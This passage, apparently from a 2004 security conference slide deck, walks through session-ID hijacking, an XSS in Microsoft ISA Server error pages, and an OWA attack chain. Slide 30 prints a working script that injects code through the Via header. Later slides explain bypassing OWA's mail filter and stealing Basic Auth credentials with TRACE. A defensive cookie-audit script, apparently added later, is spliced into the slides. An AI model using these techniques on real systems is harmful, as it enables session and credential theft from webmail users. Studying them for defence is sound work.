     When can we use the hijacked SID?
     If we are near the victim, behind a NAT device, we can access with his SID.
     We can steal the session of everyone who accesses through a transparent proxy (like transparent proxy devices).
     Or we can create a script to force the user to make a request and redirect it to us. Of course… they don’t see anything… (see above)
     Note: a lot of web servers use the same session cookie on both http and https domains. (This note is for the online bank developers).
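The cookie weaknesses the talk keeps returning to (a session cookie readable by injected script, the same cookie shared by http and https as noted on this slide, and a cookie scoped to a whole domain) can be checked from the Set-Cookie headers a server returns. The following audit is an added example, not code from the presentation; the header samples and the session-name heuristic are constructed here:

```javascript
// Added example, not part of the original slides: an audit of Set-Cookie headers
// for the attributes that blunt the cookie theft the talk describes.
// HttpOnly keeps the cookie out of document.cookie, so an injected script cannot
// read it; Secure stops the browser sending it over plain http (the slide 28
// note about one cookie shared by http and https); a Domain attribute widened
// to a parent domain hands the cookie to every host under it, which is why an
// XSS on any host in the domain is enough to steal it.
// Header samples are constructed for this example.

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are lower-cased; flag attributes (Secure, HttpOnly) map to true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const name = eq < 0 ? parts[0] : parts[0].slice(0, eq);
  const value = eq < 0 ? '' : parts[0].slice(eq + 1);
  const attrs = {};
  for (const attr of parts.slice(1)) {
    const i = attr.indexOf('=');
    const key = (i < 0 ? attr : attr.slice(0, i)).trim().toLowerCase();
    attrs[key] = i < 0 ? true : attr.slice(i + 1).trim();
  }
  return { name, value, attrs };
}

// Names that usually carry a session or authentication token. This is a
// heuristic; tune it to the application under review.
const SESSION_NAME = /sess|sid|auth|token|login/i;

// Audit one header. Returns { name, session, issues }; issues lists the
// weaknesses found, and non-session cookies are reported with an empty list.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const issues = [];
  if (!SESSION_NAME.test(c.name)) return { name: c.name, session: false, issues };
  if (!('httponly' in c.attrs)) issues.push('missing HttpOnly');
  if (!('secure' in c.attrs)) issues.push('missing Secure');
  const domain = c.attrs.domain;
  // Two labels or fewer (example.test) means the cookie is sent to every
  // subdomain; a host-only cookie (no Domain attribute) is the safe default.
  if (typeof domain === 'string' && domain.replace(/^\./, '').split('.').length <= 2) {
    issues.push('Domain=' + domain + ' is shared with every host under it');
  }
  return { name: c.name, session: true, issues };
}

// Audit every Set-Cookie line of a response; returns only cookies with issues.
function auditResponseCookies(headers) {
  return headers.map(auditSetCookie).filter((r) => r.issues.length > 0);
}

// Constructed sample: a webmail-style session cookie set the weak way, the
// same cookie set the hardened way, and an unrelated preference cookie.
const SAMPLE_HEADERS = [
  'sid=XYXYXYXYXYXYXY; Path=/; Domain=.example.test',
  'sid=XYXYXYXYXYXYXY; Path=/; Secure; HttpOnly; SameSite=Lax',
  'lang=en; Path=/; Max-Age=31536000',
];

console.log(JSON.stringify(auditResponseCookies(SAMPLE_HEADERS), null, 2));
```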
  • 29. Microsoft ISA Server XSS
     This example shows an XSS exploited using headers
     When we try to go to an unreachable URL through ISA Server, ISA generates an error page showing some data (the content of the “Via” header).
     We set this header ourselves.
     Now we can request a non-existent URL in an existing domain. (usually servers use the same cookie on their whole domain)
     Steal cookies -> Access.
     We don’t need a flaw in the server code. Use ISA Server instead.
  • 30. ISA Server Exploit
       <html>
       <body>
       <script type="text/javascript">
       alert("Click OK then wait for a few seconds...")
       var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")
       xmlHttp.open("GET", "http://www.infohacking.com:113", false)
       xmlHttp.setRequestHeader("Via", "CODE_INJECTED_IN_VIA_HEADER<script>alert ("ISA_SERVER_XSS_by_INFOHACKING")</script>")
       xmlHttp.send()
       xmlDoc=xmlHttp.responseText
       document.write(xmlHttp.responseText)
       </script>
       </body>
       </html>
  • 31. OWA XSS
     What do we have here?
     With OWA you can see an HTML formatted e-mail
     A user must click on a special link for this purpose in the webmail interface, and an alert will pop up.
     To avoid people executing malicious content in the client browser, OWA will try to filter the content of the mail. Good, but… not enough.
  • 32. Disabling OWA filtering
     The URL to view an HTML formatted mail is something like this:
       http://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<subject>.EML/1_multipart/2_text.htm?Security=1
     Good name for a parameter; another name could be “change_this_for_fucking_us”
     We only need to remove this parameter, and OWA doesn’t apply the filter.
  • 33. OWA XSS
     Obtaining data to create our special link.
     We need the IP or hostname of the server, the user name and the subject.
     All this we can find in the “Referer” header of an HTTP request coming from a link in the body of the message: <img src="http://<site_of_the_attacker>">
     Now, with the referrer, we can send our attack.
     We have the IP or hostname of the server (from the referrer)
     We have the user name (from the referrer)
     We know the subject
     We create a link in the body of the message without the “Security” parameter (a link to the same message without the Security parameter).
  • 34. OWA, Stolen credentials
     Nothing else?
     OWA uses cookies to track the HTTP session, but also uses "Basic Auth" for... more security? ;-)
     This “Basic Auth” (-> base64 encoded user:passwd) contains the user credentials for this domain.
     To access the "Basic Auth" header, the easiest way is via an HTTP "TRACE" request... and IIS (Internet Information Server) by default will allow that kind of request.
  • 35. XSS
     That’s all folks?? Of course, as always, the imagination of the attacker is the only limit... much more fun is possible.
     Thanks for your attention.
  • 36. FIST Conference March 2004 Not only a XSS © Toni Cortes Martinez & Hugo Vazquez Carames Infohacking Research Barcelona, 7 May 2004

Editor's Notes

  1. For most organizations, assets are divided into critical and non-critical.